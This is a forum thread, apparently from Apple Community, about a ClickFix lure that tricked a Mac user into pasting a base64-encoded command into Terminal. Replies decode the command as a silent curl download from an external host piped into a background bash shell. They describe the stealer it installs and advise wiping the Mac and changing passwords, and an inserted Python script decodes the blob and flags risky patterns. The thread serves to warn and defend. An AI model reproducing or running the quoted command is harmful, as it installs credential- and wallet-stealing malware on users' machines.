Understanding and reversing a suspicious terminal command

I was opening a site and it wanted manual verification for Cloudflare through Terminal, so I copied the command and pasted it. It was " echo "Y3VybCAtcyBodHRwczovL2dhbW1hLnBsYWluZmVuYXNzb2NpYXRlcy5jb20vc3RyaXgvaW5kZXgucGhwIHwgbm9odXAgYmFzaCAm" | base64 -d | bash "


Also, after that Terminal asked for disk permissions, but I declined; I don't know if that'll help.


I'm not sure what that is, but I'm suspicious, so how do I undo or reverse it, or just know what that was about?


Thank you


[Re-Titled by Moderator]

Original Title: terminal command

MacBook Pro 14″

Posted on Sep 12, 2025 10:19 AM

Question marked as Top-ranking reply

Posted on Sep 12, 2025 2:20 PM

That wasn’t manual verification, that was a malicious exploit.


One of the variations of this is known as ClickFix. There may be others.


As for what happened here, that depends entirely on what was downloaded, and the downloaded tooling can vary widely. And what got downloaded can then make other changes, deletions, additions, whatever.


Restore your system from backup. Change your credentials. Now.


Reading:


The same technique is also being used elsewhere:

26 replies

Sep 12, 2025 2:31 PM in response to Gad-2

Gad-2 wrote:

Can I do anything to know for sure if I'm compromised or not? Also, it's a fresh device with no data at all, but I logged into my Apple and Google accounts on it. Could it have access to my browser data that is saved in the cloud?

I don't know if you could "prove" you are "ok" because whatever you look for, you might miss something.


Instead of trying to figure out what might have happened, assume the worst and make a clean start.


I think changing the Apple ID and Google (and all other) passwords is how to start. Especially if they are synchronized across multiple devices. Now is the time to act before someone else does something.


Wiping the Mac and restoring from a backup predating the "event" plus changing ALL passwords makes you quite secure, I think. By the way, ALL passwords includes banking, all logins to web sites, social media, Microsoft-365, emails, Netflix etc., everything. As all that stuff from Keychain or Passwords or caches or browser saved data could be accessed and sent out to whomever instigated this. Some passwords and credit card info is saved in these places. In fact I think that is what those nasty scripts try to do that you might have unintentionally executed in Terminal.


Also, temporarily disable Wallet on all your devices. Definitely monitor all your credit cards and debit accounts carefully going forward.


I don't think I would be able to sleep at night until I did these things if this happened to me. Don't waste time or energy rethinking or regretting what happened, just focus on what you need to do going forward.


Lesson learned might be to be very cautious about any use of Terminal. And never to insert any code externally found or generated into your Mac via scripts or Terminal commands.

Sep 12, 2025 11:24 AM in response to Gad-2

Gad-2 wrote:

This is exactly what happened with me. Did I get hacked? And how do I make sure I'm not compromised?



[Edited by Moderator]

This is social engineering and it tricked you: when you clicked the "copy" button it did not copy that innocuous text but instead loaded something else, which you pasted into Terminal, of all things. You were not hacked, but it appears you may have been tricked into executing a script that may have copied any number of private items from your Mac or loaded who knows what.


I would change your Apple ID to start and then change all your passwords. Use two-factor for everything. As Camelot suggests, restore your computer from a backup that predates this event.

Nov 5, 2025 10:28 AM in response to v_panos

v_panos wrote:

Same issue here, got the Cloudflare page asking me to verify via Terminal with a copy-paste command.

When I pasted the command and pressed enter it asked me for my Mac password. I immediately understood that I made a mistake, so at that moment I just HARD SWITCHED OFF my laptop, but am not sure if it was compromised.

I believe you avoided the worst implications by never entering the password, which greatly limits what can be done, especially on a Mac. That said, Apple is constantly providing MacOS updates to plug holes in security, some of which do not require an administrator password.


One thing you can do for a little more peace of mind is run Malwarebytes which does check for malware, which I think is the primary concern here.

It would take me a few days to empty my Mac onto hard disk and make a fresh install of macOS.

I don't think that is the case, I have actually done this and it took several hours. And after doing it, the Mac ran more responsively because the "clean install/refresh" no doubt rid me of unneeded background items.

Is there a way to check if something was installed? A way to check if it was compromised?

You can check by going to About This Mac or Settings and select System Report, then look under Installations. It lists everything installed and when it was installed. But a nefarious program might hide itself from that list, and that list is for software, not sure if startup or system launch scripts would even show up there. You could check your startup items and launchd items. But the people engineering these things are clever and might find a way to hide it from you.

I opened the laptop again, changed the user password on Apple account.
I will need to move all my data out before reinstalling macOS, however in the meantime I am not sure if my data is safe.

Good to change the Apple password, also change your user account passwords on the Mac, router password, and I would change banking/finance site passwords also.


Since you actually pasted a bad command into terminal and pushed enter, I think I would backup all files (or better yet, use a backup done from before the event) and then do a complete reset of the Mac, following Apple's instructions for what to do before preparing a Mac for sale or exchange. Then install a new MacOS and I would feel ok about migrating files only from the backup, don't migrate any executable code and no settings. With all those password changes you made I would feel pretty secure. When I have done this in the past (I did it to restore an older laptop to a clean install status for other reasons), it only took several hours, including the time to reinstall all software (e.g. Microsoft, Adobe, other purchased software) anew. Maybe others will weigh in here, either what I suggest is overly cautious or not cautious enough.

Sep 12, 2025 12:25 PM in response to Gad-2

Gad-2 wrote:



I would tend to agree with steve626's comments above, including:

"As Camelot suggests, restore your computer from a backup that predates this event. "


It seems painless enough to erase/reinstall macOS and restore your User from a backup, just to proceed with a regained sense of confidence.



The concerning part of the dubious base64 code, which was not specifically commented on:


nohup bash & — command used to run a Bash script or command in the background, ensuring it continues to execute even if the user logs out or closes the terminal


nohup – invoke a utility immune to hangups



ref: How to reinstall macOS - Apple Support


ref: Restore your Mac from a backup - Apple Support



Sep 12, 2025 11:16 AM in response to Gad-2

The link it's pointing to throws up all kinds of red flags on my system - the site itself (plainfenassociates.com) is marked as compromised, and likely being used as a malware distribution node.


The fact they try to obfuscate the hostname via base64 encoding the URL is another red flag.


So, definitely a concern. How much depends on how far down their rabbit hole you fell. Viewing the site should be innocuous, but if you downloaded and installed anything from there, time to wipe your machine and revert to a backup.

Sep 12, 2025 11:24 AM in response to Gad-2

Gad-2 wrote:
This is exactly what happened with me. Did I get hacked?

It was almost certainly an attempt to do so. Unfortunately, this is how social engineering works.


It's why, for example, after decoding the string of text you posted I did not post the full link but rather just the top level domain. Looking at the website (Ascent Gate), I would judge it to be fake. No details beyond the one page, the address is to a non-existent location (no building there, much less a commercial one), the phone number is a dead end, etc.


I suspect that because of the speed bump put into macOS that required your permission for disk access and which you denied, that the attempt was thwarted. However, that's my personal thinking – this is outside my area of knowledge (though I will say I would never enter anything in Terminal prompted by a browser popup).

Sep 12, 2025 1:56 PM in response to Gad-2

Gad-2 wrote:

I'm not sure what that is but i'm suspecious so how do i undo or reverse or just know what that was about?

It's a cryptocurrency stealer malware for Chrome.


It might do other things too. Inside the obfuscated download are still more obfuscated Chrome extensions. But much of the crypto-stealer logic is in plain text, so that's easy to see. It also installs something called "salmonela", which can't be good I'm sure.


Edit: It's looking at Safari and various Firefox flavours too.

Sep 12, 2025 10:46 AM in response to Gad-2

Gad-2 wrote:

I was opening a site and it wanted manual verification for Cloudflare through Terminal, so I copied the command and pasted it. It was " echo "Y3VybCAtcyBodHRwczovL2dhbW1hLnBsYWluZmVuYXNzb2NpYXRlcy5jb20vc3RyaXgvaW5kZXgucGhwIHwgbm9odXAgYmFzaCAm" | base64 -d | bash "

I'm not sure what that is, but I'm suspicious, so how do I undo or reverse it, or just know what that was about?

Thank you

[Re-Titled by Moderator]
Original Title: terminal command



You do not paint a very big picture — what were you prompted to run in the Terminal, and why...?


curl - transfer a URL


-s flag --silent or quiet mode. Do not show progress meter or error messages. Makes Curl mute.



The base64 translates:

curl -s https://gamma.plainfenassociates.com/strix/index.php | nohup bash &



TLD https://plainfenassociates.com/
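Two replies in this thread (the one picking apart nohup bash &, and this one decoding the base64 string) work out by hand what the pasted command does. As an added example that is not part of the thread, the following Python script does the same triage without executing anything: it decodes any base64 blobs it finds, pulls out the hostnames, and flags the constructs a defender looks for (base64 -d piped to a shell, curl -s, nohup, a trailing &). The sample input is the command quoted in the original post; the pattern list and wording of the flags are my own.

```python
import base64
import re
from urllib.parse import urlparse

# Sample input: the command quoted in the original post of this thread. It is only parsed, never run.
PASTED = ('echo "Y3VybCAtcyBodHRwczovL2dhbW1hLnBsYWluZmVuYXNzb2NpYXRlcy5jb20vc3RyaXgvaW5kZXgucGhwIHwgbm9odXAgYmFzaCAm"'
          ' | base64 -d | bash')

B64_RE = re.compile(r'[A-Za-z0-9+/]{16,}={0,2}')
# Patterns a defender looks for in a pasted "verification" command (my own list, not from the thread).
RISKY = {
    r'base64\s+(-d|-D|--decode)\b': 'decodes an obfuscated payload',
    r'\|\s*(ba|z)?sh\b': 'pipes downloaded/decoded text straight into a shell',
    r'\bcurl\s+-s\b': 'silent download hides progress and errors',
    r'\bnohup\b': 'detaches the process so it survives closing Terminal',
    r'&\s*$': 'runs in the background',
}

def decode_layers(cmd, max_depth=3):
    """Return [cmd, decoded_1, ...] by decoding base64 blobs found in the text; never executes anything."""
    layers = [cmd]
    for _ in range(max_depth):
        decoded = None
        for blob in B64_RE.findall(layers[-1]):
            try:
                text = base64.b64decode(blob, validate=True).decode('utf-8')
            except (ValueError, UnicodeDecodeError):
                continue  # not real base64 (e.g. a long hostname) or not text
            if all(c.isprintable() or c in '\n\t' for c in text):
                decoded = text
                break
        if decoded is None:
            break
        layers.append(decoded)
    return layers

def triage(cmd):
    """Decode, extract contacted hosts and flag risky constructs across all layers."""
    layers = decode_layers(cmd)
    full = '\n'.join(layers)
    urls = re.findall(r'https?://[^\s"\'|<>]+', full)
    hosts = sorted({urlparse(u).hostname for u in urls})
    flags = sorted(desc for pat, desc in RISKY.items() if re.search(pat, full, re.M))
    return {'layers': layers, 'hosts': hosts, 'flags': flags}

if __name__ == '__main__':
    report = triage(PASTED)
    for i, layer in enumerate(report['layers']):
        print(f'layer {i}: {layer}')
    print('hosts:', report['hosts'])
    print('flags:', *report['flags'], sep='\n  - ')
```

The hosts it reports are what you would block or search for in DNS and proxy logs; anything with two or more flags deserves the treatment the replies above recommend rather than a second look at the command.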


Sep 12, 2025 11:41 AM in response to Gad-2

Gad-2 wrote:

also after that terminal asked for disk permissions but i declined, don't know if that'll help.


Sounds like you may have dodged a bullet...


The whole thing seems naive Internet behavior; might be worth reviewing some of the fundamentals, including not copying & pasting unknown random Terminal commands from some dubious website.


Recognize and avoid phishing messages...

Recognize and avoid social engineering schemes including phishing messages, phony support calls, and other scams - Apple Support


Protecting against malware in macOS

Protecting against malware in macOS - Apple Support


Effective defenses against malware and other threats… - Apple Community

Effective defenses against malware and ot… - Apple Community


Security and your Apple Account Security and your Apple Account - Apple Support



Sep 29, 2025 4:11 AM in response to Gad-2

I got a similar thing and out of curiosity, I ran it on my older mac which was restored to factory settings. It downloads a script from

curl -s | nohup bash &


It asked for a password which I did not provide and on running ps, I found a command running on my machine. It is a script to be executed from osascript. I have attached the contents of the script for anyone who is interested as additional text as it went over the 5000 char limit


[Edited by Moderator]

Sep 29, 2025 5:01 AM in response to Servant of Cats

yea, it actually does a lot. In some digging through

  1. reads password
  2. adds a bunch of cookies to chromium based browsers
  3. grabs pdf, docs, wallets etc
  4. tries to get cryptowallets


I am not too proficient in osascripts but do understand the syntax a bit. It appears to be a smart plug. For reference, this happened to me with DuckDuckGo as my browser and clicking on the first link of the search "GPU Benchmarks for ML". Oddly enough, when I clicked the link today, this did not happen.


[Edited by Moderator]



Sep 29, 2025 6:41 AM in response to ashsriv

ashsriv wrote:

yea, it actually does a lot. In some digging through
1. reads password
2. adds a bunch of cookies to chromium based browsers
3. grabs pdf, docs, wallets etc
4. tries to get cryptowallets


I would also add the caution that the scammer site might have been set up to return different malicious scripts at different times.


We cannot rule out the possibility that other people might have gotten scripts with even more nasty stuff in them.

Nov 5, 2025 2:19 PM in response to Camelot

Camelot wrote:

> When I pasted the command and pressed enter it asked me for my Mac password. I immediately understood that I made a mistake, so at that moment I just HARD SWITCHED OFF my laptop, but am not sure if it was compromised.

Not much could happen if you didn't enter your password. That's the last defense against anything malicious. Everything up to that point (copying the script, downloading files to your machine, etc.) is moot and irrelevant until you enter that password and then you've let them in and lost all control.


Many core macOS files might be protected – but a malicious script would not need to get the user's password in order to ransack, copy, and/or vandalize the user's data.


Including, perhaps, files containing information that would be useful for committing identity / financial fraud.
